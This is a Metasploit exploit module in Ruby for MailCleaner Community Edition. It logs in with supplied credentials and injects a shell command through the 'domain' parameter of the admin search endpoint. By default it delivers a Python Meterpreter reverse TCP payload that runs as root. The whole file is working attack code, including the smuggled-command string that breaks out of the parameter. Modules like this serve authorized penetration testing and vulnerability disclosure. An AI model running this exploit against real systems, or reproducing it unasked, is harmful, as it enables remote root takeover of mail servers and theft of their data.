##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Mailcleaner Remote Code Execution",
      'Description'    => %q{
        This module exploits the command injection vulnerability of MailCleaner Community Edition product. An authenticated user can execute an
        operating system command under the context of the web server user which is root.

        /admin/managetracing/search/search endpoint takes several user inputs and then pass them to the internal service which is responsible for executing
        operating system command. One of the user input is being passed to the service without proper validation. That cause a command injection vulnerability.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
        ],
      'References'     =>
        [
          ['URL', 'https://pentest.blog/advisory-mailcleaner-community-edition-remote-code-execution/']
        ],
      'DefaultOptions'  =>
        {
          'SSL' => true,
          'WfsDelay' => 5,
          'Payload'  => 'python/meterpreter/reverse_tcp'
        },
      'Platform'       => ['python', 'unix'],
      'Arch'           => [ ARCH_PYTHON, ARCH_CMD ],
      'Targets'        =>
        [
          [
            'Python payload',
            {
              'Platform' => 'python',
              'Arch' => ARCH_PYTHON,
            }
          ],
          [
            'Command payload',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Payload' =>
              {
                'BadChars' => "\x26",
              }
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Dec 19 2018",
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        Opt::RPORT(443),
        OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']),
        OptString.new('USERNAME', [true, 'The username to login as']),
        OptString.new('PASSWORD', [true, 'The password to login with'])
      ]
    )
  end

  def username
    datastore['USERNAME']
  end

  def password
    datastore['PASSWORD']
  end

  def auth
    print_status('Performing authentication...')

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'admin/')
    })

    if res && !res.get_cookies.empty?
      cookie = res.get_cookies
    else
      fail_with(Failure::UnexpectedReply, 'Did not get cookie-set header from response.')
    end

    # Performing authentication
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'admin/'),
      'cookie'    => cookie,
      'vars_post' => {
        'username'  => username,
        'password' => password,
        'submit' => 'Log+in'
      }
    })

    if res && res.code == 302
      print_good("Awesome..! Authenticated with #{username}:#{password}")
    else
      fail_with(Failure::NoAccess, 'Credentials are not valid.')
    end

    cookie
  end

  def exploit
    cookie = auth

    if cookie.nil?
      fail_with(Failure::Unknown, 'Something went wrong!')
    end

    print_status('Exploiting command injection flaw')

    if target['Arch'] == ARCH_PYTHON
      cmd = "';$(python -c \"#{payload.encoded}\");#"
    else
      cmd = "';#{payload.encoded};#"
    end

    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'admin', 'managetracing', 'search', 'search'),
      'cookie'    => cookie,
      'vars_post' => {
        'search' => rand_text_alpha(5),
        'domain' => cmd,
        'submit' => 1
      }
    })

  end
end